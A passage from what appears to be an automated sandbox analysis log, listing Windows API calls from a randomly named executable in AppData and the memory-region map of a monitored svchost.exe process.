[0275.094] AdjustWindowRectEx (in: lpRect=0x16ee8c, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x16ee8c) returned 1
[0275.094] AdjustWindowRectEx (in: lpRect=0x16f028, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x16f028) returned 1
[0275.094] AdjustWindowRectEx (in: lpRect=0x16ee8c, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x16ee8c) returned 1
[0275.094] AdjustWindowRectEx (in: lpRect=0x16f028, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x16f028) returned 1
[0275.094] AdjustWindowRectEx (in: lpRect=0x16ee8c, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x16ee8c) returned 1
[0275.094] AdjustWindowRectEx (in: lpRect=0x16f028, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x16f028) returned 1
[0275.094] AdjustWindowRectEx (in: lpRect=0x16ee8c, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x16ee8c) returned 1
[0275.094] AdjustWindowRectEx (in: lpRect=0x16f028, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x16f028) returned 1
[0275.094] AdjustWindowRectEx (in: lpRect=0x16ee8c, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x16ee8c) returned 1
[0275.095] AdjustWindowRectEx (in: lpRect=0x16f064, dwStyle=0x56000000, bMenu=0, dwExStyle=0x10000 | out: lpRect=0x16f064) returned 1
[0275.095] AdjustWindowRectEx (in: lpRect=0x16eec8, dwStyle=0x56000000, bMenu=0, dwExStyle=0x10000 | out: lpRect=0x16eec8) returned 1
[0275.095] AdjustWindowRectEx (in: lpRect=0x16f028, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x16f028) returned 1
[0275.095] AdjustWindowRectEx (in: lpRect=0x16ee8c, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x16ee8c) returned 1
[0275.095] AdjustWindowRectEx (in: lpRect=0x16ece4, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x16ece4) returned 1
[0275.095] AdjustWindowRectEx (in: lpRect=0x16f028, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x16f028) returned 1
[0275.095] AdjustWindowRectEx (in: lpRect=0x16ee8c, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x16ee8c) returned 1
[0275.095] AdjustWindowRectEx (in: lpRect=0x16ece4, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x16ece4) returned 1
[0275.096] AdjustWindowRectEx (in: lpRect=0x16edd8, dwStyle=0x2cf0000, bMenu=0, dwExStyle=0x50000 | out: lpRect=0x16edd8) returned 1
[0275.096] AdjustWindowRectEx (in: lpRect=0x16effc, dwStyle=0x2cf0000, bMenu=0, dwExStyle=0x50000 | out: lpRect=0x16effc) returned 1
[0275.096] AdjustWindowRectEx (in: lpRect=0x16ed50, dwStyle=0x2cf0000, bMenu=0, dwExStyle=0x50000 | out: lpRect=0x16ed50) returned 1
[0275.096] AdjustWindowRectEx (in: lpRect=0x16ee34, dwStyle=0x2cf0000, bMenu=0, dwExStyle=0x50000 | out: lpRect=0x16ee34) returned 1
[0275.096] GetSystemMetrics (nIndex=34) returned 132
[0275.096] GetSystemMetrics (nIndex=35) returned 38
[0275.096] AdjustWindowRectEx (in: lpRect=0x16efbc, dwStyle=0x56000000, bMenu=0, dwExStyle=0x10000 | out: lpRect=0x16efbc) returned 1
[0275.096] AdjustWindowRectEx (in: lpRect=0x16ee20, dwStyle=0x56000000, bMenu=0, dwExStyle=0x10000 | out: lpRect=0x16ee20) returned 1
[0275.140] EtwEventRegister () returned 0x0
[0275.146] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\nFxIoujoILCO.exe.config", nBufferLength=0x105, lpBuffer=0x16e980, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\nFxIoujoILCO.exe.config", lpFilePart=0x0) returned 0x3a
[0275.146] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x16ebc8) returned 1
[0275.146] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\nFxIoujoILCO.exe.config" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\nfxioujoilco.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x16ee8c | out: lpFileInformation=0x16ee8c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
[0275.147] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16ebc4) returned 1
[0275.948] CreateFileMappingW (hFile=0xffffffff, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xfa00, lpName=0x0) returned 0x248
[0275.949] memcpy (in: _Dst=0x4c0000, _Src=0x23f5248, _Size=0xfa00 | out: _Dst=0x4c0000) returned 0x4c0000
[0275.950] CloseHandle (hObject=0x248) returned 1
Thread:
id = 124
os_tid = 0x6a0
Thread:
id = 125
os_tid = 0x65c
[0273.122] CoGetContextToken (in: pToken=0xc0f67c | out: pToken=0xc0f67c) returned 0x800401f0
[0273.122] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
Thread:
id = 126
os_tid = 0x314
Thread:
id = 127
os_tid = 0x6d4
Thread:
id = 128
os_tid = 0x328
Process:
id = "9"
image_name = "svchost.exe"
filename = "c:\\windows\\system32\\svchost.exe"
page_root = "0x244d2000"
os_pid = "0x34c"
os_integrity_level = "0x4000"
os_privileges = "0xe60b1e890"
monitor_reason = "rpc_server"
parent_id = "7"
os_parent_pid = "0x1c8"
cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs"
cur_dir = "C:\\Windows\\system32\\"
os_username = "NT AUTHORITY\\SYSTEM"
bitness = "32"
os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000dd0a" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe]
Region:
id = 2493
start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 2494
start_va = 0x20000
end_va = 0x20fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "svchost.exe.mui"
filename = "\\Windows\\System32\\en-US\\svchost.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\svchost.exe.mui")
Region:
id = 2495
start_va = 0x30000
end_va = 0x33fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 2496
start_va = 0x40000
end_va = 0x40fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 2497
start_va = 0x50000
end_va = 0xb6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 2498
start_va = 0xc0000
end_va = 0x1bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000c0000"
filename = ""
Region:
id = 2499
start_va = 0x1c0000
end_va = 0x1c0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001c0000"
filename = ""
Region:
id = 2500
start_va = 0x1d0000
end_va = 0x1dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001d0000"
filename = ""
Region:
id = 2501
start_va = 0x1e0000
end_va = 0x1e0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001e0000"
filename = ""
Region:
id = 2502
start_va = 0x1f0000
end_va = 0x1f0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001f0000"
filename = ""
Region:
id = 2503
start_va = 0x200000
end_va = 0x200fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000200000"
filename = ""
Region:
id = 2504
start_va = 0x210000
end_va = 0x28ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000210000"
filename = ""
Region:
id = 2505
start_va = 0x290000
end_va = 0x417fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000290000"
filename = ""
Region:
id = 2506
start_va = 0x420000
end_va = 0x420fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000420000"
filename = ""
Region:
id = 2507
start_va = 0x430000
end_va = 0x52ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000430000"
filename = ""
Region:
id = 2508
start_va = 0x530000
end_va = 0x6b0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000530000"
filename = ""
Region:
id = 2509
start_va = 0x6c0000
end_va = 0x77ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000006c0000"
filename = ""
Region:
id = 2510
start_va = 0x780000
end_va = 0x78afff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "gpsvc.dll.mui"
filename = "\\Windows\\System32\\en-US\\gpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\gpsvc.dll.mui")
Region:
id = 2511
start_va = 0x790000
end_va = 0x79cfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "setupapi.dll.mui"
filename = "\\Windows\\System32\\en-US\\setupapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\setupapi.dll.mui")
Region:
id = 2512
start_va = 0x7a0000
end_va = 0x7a3fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "taskcomp.dll.mui"
filename = "\\Windows\\System32\\en-US\\taskcomp.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\taskcomp.dll.mui")
Region:
id = 2513
start_va = 0x7b0000
end_va = 0x7b9fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "schedsvc.dll.mui"
filename = "\\Windows\\System32\\en-US\\schedsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\schedsvc.dll.mui")
Region:
id = 2514
start_va = 0x7c0000
end_va = 0x7c0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000007c0000"
filename = ""
Region:
id = 2515
start_va = 0x7d0000
end_va = 0x7d1fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000007d0000"
filename = ""
Region:
id = 2516
start_va = 0x7e0000
end_va = 0x7e3fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "cversions.2.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db")
Region:
id = 2517
start_va = 0x7f0000
end_va = 0x7f1fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000007f0000"
filename = ""
Region:
id = 2518
start_va = 0x800000
end_va = 0x87ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000800000"
filename = ""
Region:
id = 2519
start_va = 0x880000
end_va = 0x8affff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000015.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000015.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000015.db")
Region:
id = 2520
start_va = 0x8b0000
end_va = 0x8b3fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "cversions.2.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db")
Region:
id = 2521
start_va = 0x8c0000
end_va = 0x93ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000008c0000"
filename = ""
Region:
id = 2522
start_va = 0x940000
end_va = 0x94dfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "propsys.dll.mui"
filename = "\\Windows\\System32\\en-US\\propsys.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\propsys.dll.mui")
Region:
id = 2523
start_va = 0x950000
end_va = 0x9cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000950000"
filename = ""
Region:
id = 2524
start_va = 0x9f0000
end_va = 0xa6ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000009f0000"
filename = ""
Region:
id = 2525
start_va = 0xa70000
end_va = 0xa7ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000a70000"
filename = ""
Region:
id = 2526
start_va = 0xa90000
end_va = 0xb0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000a90000"
filename = ""
Region:
id = 2527
start_va = 0xb10000
end_va = 0xb8ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000b10000"
filename = ""
Region:
id = 2528
start_va = 0xba0000
end_va = 0xc1ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000ba0000"
filename = ""
Region:
id = 2529
start_va = 0xc20000
end_va = 0xeeefff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 2530
start_va = 0xf10000
end_va = 0xf8ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000f10000"
filename = ""
Region:
id = 2531
start_va = 0xfa0000
end_va = 0x101ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000fa0000"
filename = ""
Region:
id = 2532
start_va = 0x1080000
end_va = 0x10fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001080000"
filename = ""
Region:
id = 2533
start_va = 0x1110000
end_va = 0x118ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001110000"
filename = ""
Region:
id = 2534
start_va = 0x1190000
end_va = 0x120ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001190000"
filename = ""
Region:
id = 2535
start_va = 0x1270000
end_va = 0x12effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001270000"
filename = ""
Region:
id = 2536
start_va = 0x12f0000
end_va = 0x1355fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db")
Region:
id = 2537
start_va = 0x1380000
end_va = 0x13fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001380000"
filename = ""
Region:
id = 2538
start_va = 0x1400000
end_va = 0x147ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001400000"
filename = ""
Region:
id = 2539
start_va = 0x14a0000
end_va = 0x151ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000014a0000"
filename = ""
Region:
id = 2540
start_va = 0x1520000
end_va = 0x159ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001520000"
filename = ""
Region:
id = 2541
start_va = 0x15c0000
end_va = 0x163ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000015c0000"
filename = ""
Region:
id = 2542
start_va = 0x16b0000
end_va = 0x172ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000016b0000"
filename = ""
Region:
id = 2543
start_va = 0x1750000
end_va = 0x17cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001750000"
filename = ""
Region:
id = 2544
start_va = 0x1820000
end_va = 0x189ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001820000"
filename = ""
Region:
id = 2545
start_va = 0x1940000
end_va = 0x19bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001940000"
filename = ""
Region:
id = 2546
start_va = 0x19c0000
end_va = 0x1abffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000019c0000"
filename = ""
Region:
id = 2547
start_va = 0x1ac0000
end_va = 0x1bbffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001ac0000"
filename = ""
Region:
id = 2548
start_va = 0x77090000
end_va = 0x77189fff
monitored = 0
entry_point = 0x770aa2c8
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 2549
start_va = 0x77190000
end_va = 0x772aefff
monitored = 0
entry_point = 0x771a5340
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 2550
start_va = 0x772b0000
end_va = 0x77458fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 2551
start_va = 0x7efe0000
end_va = 0x7f0dffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efe0000"
filename = ""
Region:
id = 2552
start_va = 0x7f0e0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007f0e0000"
filename = ""
Region:
id = 2553
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 2554
start_va = 0xff5b0000
end_va = 0xff5bafff
monitored = 0
entry_point = 0xff5b246c
region_type = mapped_file
name = "svchost.exe"
filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe")
Region:
id = 2555
start_va = 0x7fefa490000
end_va = 0x7fefa498fff
monitored = 0
entry_point = 0x7fefa4911a0
region_type = mapped_file
name = "tschannel.dll"
filename = "\\Windows\\System32\\TSChannel.dll" (normalized: "c:\\windows\\system32\\tschannel.dll")
Region:
id = 2556
start_va = 0x7fefa700000
end_va = 0x7fefa776fff
monitored = 0
entry_point = 0x7fefa70afd0
region_type = mapped_file
name = "taskcomp.dll"
filename = "\\Windows\\System32\\taskcomp.dll" (normalized: "c:\\windows\\system32\\taskcomp.dll")
Region:
id = 2557
start_va = 0x7fefa780000
end_va = 0x7fefa78efff
monitored = 0
entry_point = 0x7fefa787e80
region_type = mapped_file
name = "wiarpc.dll"
filename = "\\Windows\\System32\\wiarpc.dll" (normalized: "c:\\windows\\system32\\wiarpc.dll")
Region:
id = 2558
start_va = 0x7fefa790000
end_va = 0x7fefa799fff
monitored = 0
entry_point = 0x7fefa79260c
region_type = mapped_file
name = "ktmw32.dll"
filename = "\\Windows\\System32\\ktmw32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll")
Region:
id = 2559
start_va = 0x7fefa7a0000
end_va = 0x7fefa8b1fff
monitored = 0
entry_point = 0x7fefa7bf354
region_type = mapped_file
name = "schedsvc.dll"
filename = "\\Windows\\System32\\schedsvc.dll" (normalized: "c:\\windows\\system32\\schedsvc.dll")
Region:
id = 2560
start_va = 0x7fefa8c0000
end_va = 0x7fefa8c8fff
monitored = 0
entry_point = 0x7fefa8c3668
region_type = mapped_file
name = "fvecerts.dll"
filename = "\\Windows\\System32\\fvecerts.dll" (normalized: "c:\\windows\\system32\\fvecerts.dll")
Region:
id = 2561
start_va = 0x7fefa8d0000
end_va = 0x7fefa8d8fff
monitored = 0
entry_point = 0x7fefa8d1020
region_type = mapped_file
name = "tbs.dll"
filename = "\\Windows\\System32\\tbs.dll" (normalized: "c:\\windows\\system32\\tbs.dll")
Region:
id = 2562
start_va = 0x7fefa8e0000
end_va = 0x7fefa935fff
monitored = 0
entry_point = 0x7fefa8e1040
region_type = mapped_file
name = "fveapi.dll"
filename = "\\Windows\\System32\\fveapi.dll" (normalized: "c:\\windows\\system32\\fveapi.dll")
Region:
id = 2563
start_va = 0x7fefa960000
end_va = 0x7fefa9bdfff
monitored = 0
entry_point = 0x7fefa969024
region_type = mapped_file
name = "shsvcs.dll"
filename = "\\Windows\\System32\\shsvcs.dll" (normalized: "c:\\windows\\system32\\shsvcs.dll")
Region:
id = 2564
start_va = 0x7fefacc0000
end_va = 0x7fefacd3fff
monitored = 0
entry_point = 0x7fefacc3e64
region_type = mapped_file
name = "sens.dll"
filename = "\\Windows\\System32\\Sens.dll" (normalized: "c:\\windows\\system32\\sens.dll")
Region:
id = 2565
start_va = 0x7fefad60000
end_va = 0x7fefadc6fff
monitored = 0
entry_point = 0x7fefad76060
region_type = mapped_file
name = "es.dll"
filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll")
Region:
id = 2566
start_va = 0x7fefade0000
end_va = 0x7fefadeafff
monitored = 0
entry_point = 0x7fefade4f8c
region_type = mapped_file
name = "slc.dll"
filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll")
Region:
id = 2567
start_va = 0x7fefaf20000
end_va = 0x7fefaf2bfff
monitored = 0
entry_point = 0x7fefaf215d8
region_type = mapped_file
name = "dsrole.dll"
filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll")
Region:
id = 2568
start_va = 0x7fefaf30000
end_va = 0x7fefaf3ffff
monitored = 0
entry_point = 0x7fefaf3835c
region_type = mapped_file
name = "themeservice.dll"
filename = "\\Windows\\System32\\themeservice.dll" (normalized: "c:\\windows\\system32\\themeservice.dll")
Region:
id = 2569
start_va = 0x7fefaf40000
end_va = 0x7fefaf58fff
monitored = 0
entry_point = 0x7fefaf411a8
region_type = mapped_file
name = "atl.dll"
filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll")
Region:
id = 2570
start_va = 0x7fefaf60000
end_va = 0x7fefaf96fff
monitored = 0
entry_point = 0x7fefaf68424
region_type = mapped_file
name = "profsvc.dll"
filename = "\\Windows\\System32\\profsvc.dll" (normalized: "c:\\windows\\system32\\profsvc.dll")
Region:
id = 2571
start_va = 0x7fefafd0000
end_va = 0x7fefafe4fff
monitored = 0
entry_point = 0x7fefafd60d8
region_type = mapped_file
name = "nlaapi.dll"
filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll")
Region:
id = 2572
start_va = 0x7fefaff0000
end_va = 0x7fefb0b1fff
monitored = 0
entry_point = 0x7fefaff101c
region_type = mapped_file
name = "gpsvc.dll"
filename = "\\Windows\\System32\\gpsvc.dll" (normalized: "c:\\windows\\system32\\gpsvc.dll")
Region:
id = 2573
start_va = 0x7fefb170000
end_va = 0x7fefb18cfff
monitored = 0
entry_point = 0x7fefb172f18
region_type = mapped_file
name = "mmcss.dll"
filename = "\\Windows\\System32\\mmcss.dll" (normalized: "c:\\windows\\system32\\mmcss.dll")
Region:
id = 2574
start_va = 0x7fefb190000
end_va = 0x7fefb198fff
monitored = 0
entry_point = 0x7fefb191010
region_type = mapped_file
name = "avrt.dll"
filename = "\\Windows\\System32\\avrt.dll" (normalized: "c:\\windows\\system32\\avrt.dll")
Region:
id = 2575
start_va = 0x7fefb280000
end_va = 0x7fefb2acfff
monitored = 0
entry_point = 0x7fefb281010
region_type = mapped_file
name = "ntmarta.dll"
filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll")
Region:
id = 2576
start_va = 0x7fefb420000
end_va = 0x7fefb434fff
monitored = 0
entry_point = 0x7fefb421050
region_type = mapped_file
name = "wkscli.dll"
filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll")
Region:
id = 2577
start_va = 0x7fefb440000
end_va = 0x7fefb44bfff
monitored = 0
entry_point = 0x7fefb4418a4
region_type = mapped_file
name = "netutils.dll"
filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll")
Region:
id = 2578
start_va = 0x7fefb450000
end_va = 0x7fefb465fff
monitored = 0
entry_point = 0x7fefb4511a0
region_type = mapped_file
name = "netapi32.dll"
filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll")
Region:
id = 2579
start_va = 0x7fefb6b0000
end_va = 0x7fefb6c0fff
monitored = 0
entry_point = 0x7fefb6b1070
region_type = mapped_file
name = "wtsapi32.dll"
filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll")
Region:
id = 2580
start_va = 0x7fefb6e0000
end_va = 0x7fefb714fff
monitored = 0
entry_point = 0x7fefb6e1064
region_type = mapped_file
name = "xmllite.dll"
filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll")
Region:
id = 2581
start_va = 0x7fefbb50000
end_va = 0x7fefbba5fff
monitored = 0
entry_point = 0x7fefbb5bbc0
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")
Region:
id = 2582
start_va = 0x7fefbbb0000
end_va = 0x7fefbcdbfff
monitored = 0
entry_point = 0x7fefbbb94bc
region_type = mapped_file
name = "propsys.dll"
filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll")
Region:
id = 2583
start_va = 0x7fefbe80000
end_va = 0x7fefbe9cfff
monitored = 0
entry_point = 0x7fefbe81ef4
region_type = mapped_file
name = "samlib.dll"
filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll")
Region:
id = 2584
start_va = 0x7fefbed0000
end_va = 0x7fefc0c3fff
monitored = 0
entry_point = 0x7fefc05c924
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll")
Region:
id = 2585
start_va = 0x7fefc3c0000
end_va = 0x7fefc3cbfff
monitored = 0
entry_point = 0x7fefc3c1064
region_type = mapped_file
name = "version.dll"
filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll")
Region:
id = 2586
start_va = 0x7fefc490000
end_va = 0x7fefc496fff
monitored = 0
entry_point = 0x7fefc4914b0
region_type = mapped_file
name = "wshtcpip.dll"
filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll")
Region:
id = 2587
start_va = 0x7fefc550000
end_va = 0x7fefc55cfff
monitored = 0
entry_point = 0x7fefc551348
region_type = mapped_file
name = "pcwum.dll"
filename = "\\Windows\\System32\\pcwum.dll" (normalized: "c:\\windows\\system32\\pcwum.dll")
Region:
id = 2588
start_va = 0x7fefc590000
end_va = 0x7fefc5aafff
monitored = 0
entry_point = 0x7fefc592068
region_type = mapped_file
name = "gpapi.dll"
filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll")
Region:
id = 2589
start_va = 0x7fefc5b0000
end_va = 0x7fefc5cdfff
monitored = 0
entry_point = 0x7fefc5b13b8
region_type = mapped_file
name = "userenv.dll"
filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll")
Region:
id = 2590
start_va = 0x7fefc680000
end_va = 0x7fefc6b8fff
monitored = 0
entry_point = 0x7fefc68c0f0
region_type = mapped_file
name = "ubpm.dll"
